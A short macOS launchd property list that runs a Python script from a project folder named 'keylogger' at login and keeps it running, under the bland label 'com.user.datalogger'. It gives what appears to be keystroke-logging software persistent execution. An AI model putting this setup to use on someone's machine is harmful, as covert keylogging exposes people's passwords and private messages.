<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
   <key>Label</key>
   <string>com.user.datalogger</string>
   <key>ProgramArguments</key>
   <array>
   	<string>/usr/local/bin/python</string>
   	<string>/Users/mariogarrido/Projects/keylogger/__init__.pyw</string>
   	<string>MAC_AIR</string>
   	<string>/Users/mariogarrido/keylogger.ini</string>
   </array>
   <key>RunAtLoad</key>
   <true/>
   <key>KeepAlive</key>
   <true/>
   <key>ProcessType</key>
   <string>Interactive</string>
</dict>
</plist>
